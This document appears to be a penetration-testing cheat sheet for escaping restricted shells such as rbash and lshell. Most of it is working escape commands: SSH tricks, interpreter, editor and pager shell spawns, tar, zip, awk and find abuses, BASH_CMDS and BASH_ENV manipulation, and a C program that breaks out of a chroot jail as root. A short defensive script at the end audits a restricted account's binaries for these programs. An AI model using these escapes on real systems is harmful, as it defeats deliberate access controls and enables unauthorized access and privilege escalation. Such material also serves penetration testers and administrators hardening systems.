Identify Restricted Shell

echo $SHELL
echo $0
env
Common restricted shells:
| Shell | Description |
| --- | --- |
| rbash | Restricted Bash — no cd, no PATH changes, no redirects |
| rksh | Restricted Korn Shell |
| rzsh | Restricted Zsh |
| lshell | Limited Shell (Python-based) |

Typical Restrictions

  • Cannot cd
  • Cannot change PATH, SHELL, ENV
  • Cannot use / in commands
  • Cannot redirect output (>, >>)
  • Cannot use exec

Quick Escapes

SSH

Bypass rbash on login:
ssh user@TARGET -t "bash --noprofile"
ssh user@TARGET -t "/bin/bash"
ssh user@TARGET -t "sh"
Force pseudo-terminal with command:
ssh user@TARGET -t "/bin/sh"

Invoke Unrestricted Shell

bash
/bin/bash
/bin/sh
sh
If / blocked, use available commands:
cp /bin/bash .
./bash

Language Interpreters

Python

python3 -c 'import os; os.system("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'

Perl

perl -e 'exec "/bin/bash";'

Ruby

ruby -e 'exec "/bin/bash"'

Lua

lua -e 'os.execute("/bin/bash")'

PHP

php -r 'system("/bin/bash");'

Node.js

node -e 'require("child_process").spawn("/bin/bash",{stdio:[0,1,2]})'

Editor Escapes

vi / vim

vi
:set shell=/bin/bash
:shell
Or:
vi
:!/bin/bash

ed

ed
!/bin/bash

nano

Ctrl+R → Ctrl+X → /bin/bash

Pager Escapes

less

less /etc/passwd
!/bin/bash

more

more /etc/passwd
!/bin/bash

man

man man
!/bin/bash

Program-specific Escapes

awk

awk 'BEGIN {system("/bin/bash")}'

find

find / -exec /bin/bash \;

nmap (old)

nmap --interactive
!sh

ftp

ftp
!/bin/bash

gdb

gdb -q
!bash

zip

zip /tmp/a.zip /tmp/a -T --unzip-command="sh -c /bin/bash"

tar

tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash

expect

expect -c 'spawn /bin/bash; interact'

tee

Write to files even when redirect blocked:
echo "data" | tee /tmp/output.txt

PATH Manipulation

If PATH is restricted but you can set variables:
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
If export blocked:
BASH_CMDS[a]=/bin/bash
a
export PATH=$PATH:/bin:/usr/bin

Copy Trick

If cp is available:
cp /bin/bash /tmp/bash
/tmp/bash

Environment Variables

BASH_ENV

If BASH_ENV is not cleared:
export BASH_ENV=/tmp/payload.sh
# payload.sh contains: /bin/bash

ENV (for sh)

ENV=/tmp/payload.sh sh

lshell Escapes

lshell (Python-based limited shell) has known bypasses:
echo os.system('/bin/bash')
echo $(bash)
? () { /bin/bash; }; ?

Chroot Escape

If inside chroot jail with root:
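#include <unistd.h>
#include <sys/stat.h>

int main(void) {
    mkdir("chroot_escape", 0755);
    /* chroot() does not change the working directory, so the cwd ends up outside the new root */
    chroot("chroot_escape");
    for (int i = 0; i < 100; i++) chdir("..");  /* climb to the real root */
    chroot(".");
    execl("/bin/bash", "bash", (char *)NULL);
    return 1;  /* reached only if execl fails */
}

gcc escape.c -o escape && ./escape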

Quick Reference

| Method | When |
| --- | --- |
| ssh -t "/bin/bash" | SSH access available |
| python3 -c 'import pty...' | Python available |
| vi → :!/bin/bash | vi/vim available |
| less → !/bin/bash | Pager available |
| awk 'BEGIN {system(...)}' | awk available |
| BASH_CMDS[a]=/bin/bash; a | Can set variables |
| cp /bin/bash /tmp; /tmp/bash | cp available |
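
Every escape above depends on a shell-capable program being reachable from the restricted account. The script below is an added example, not part of the original page: it audits the command directory exposed to a restricted-shell user and reports any program this page lists, resolving symlinks first. The function names and the directory layout are assumptions.

```shell
#!/bin/sh
# Added example (defensive audit). Program names come from the sections of
# this page; the function names and directory layout are assumptions.
ESCAPE_CAPABLE="bash sh python3 perl ruby lua php node vi vim ed nano less
more man awk find nmap ftp gdb zip tar expect tee cp"

# is_escape_capable NAME: succeeds if NAME is a listed program, also matching
# versioned or suffixed builds such as python3.11, lua5.4 or vim.basic.
is_escape_capable() {
    for risky in $ESCAPE_CAPABLE; do
        case $1 in
            "$risky" | "$risky"[0-9]* | "$risky".*) return 0 ;;
        esac
    done
    return 1
}

# audit_restricted_bin DIR: print "entry -> resolved target" for every risky
# program exposed in DIR. Returns 0 if clean, 1 on findings, 2 if DIR is bad.
audit_restricted_bin() {
    dir=$1
    [ -d "$dir" ] || { echo "not a directory: $dir" >&2; return 2; }
    findings=0
    for entry in "$dir"/*; do
        [ -e "$entry" ] || continue   # empty directory or dangling symlink
        # Resolve symlinks so a harmless-looking name cannot hide its target.
        target=$(readlink -f "$entry" 2>/dev/null) || target=$entry
        if is_escape_capable "$(basename "$entry")" ||
           is_escape_capable "$(basename "$target")"; then
            echo "$(basename "$entry") -> $target"
            findings=1
        fi
    done
    return "$findings"
}

# Stand-alone use: sh audit.sh /path/to/restricted/bin
if [ "$#" -gt 0 ]; then audit_restricted_bin "$1"; fi
```

A non-zero exit status makes the check usable as a gate in provisioning scripts for restricted accounts.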